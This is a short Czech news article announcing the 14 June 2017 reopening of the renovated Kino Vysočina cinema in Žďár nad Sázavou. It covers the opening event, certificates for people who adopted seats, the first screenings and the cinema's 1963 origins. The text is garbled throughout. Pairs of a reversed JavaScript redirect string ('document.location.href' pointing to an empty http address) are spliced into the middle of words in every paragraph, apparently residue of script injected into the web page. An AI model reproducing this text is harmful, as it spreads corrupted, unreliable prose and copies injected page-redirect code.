Rainbow page separator

Opravené žďárské Kino Vysočina se znovu otevře 14. června

Středa, 31. května 2017

Žďár nad Sázavou / Na 14. června připravuje žďárská radnice otevření zrekonstruovaného Kina Vysočina. Akce pro veřejnost začne v 17 hodin, zájemci si mohou přijít prohlédnout opravený interiér biografu a rovněž fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie, které přibližují průběh stavebních prací.
Součástí slavnostního otevření kina se stane i předání certifikátů takzvaným Kinomilům, kteří si na dva roky adop[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali některou z nových sedaček v biografu a budou tak na ní mít cedulku se svým jménem. Jelikož ještě zbývají volné sedačky k adopci, měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to o prázdninách, kdy kino bude mít letní pauzu a promítat se bude pod širým nebem za Domem kultury, připravuje druhé kolo adopce sedaček.
Při zahájení provozu biografu v novém nemůže chybět promítání, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Trnkova Špalíčku. „Běžný“ provoz začne den po slavnostním otevření, tedy 15. června, diváci uvidí snímek Rodinný přítel. Více než půl s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí staré žďárské Kino Vysočina, které v předchozích letech postupně prošlo rekonstrukcí, zahájilo provoz 15. srpna 1963 promítáním širokoúhlého a barevného slovenského filmu Jánošík.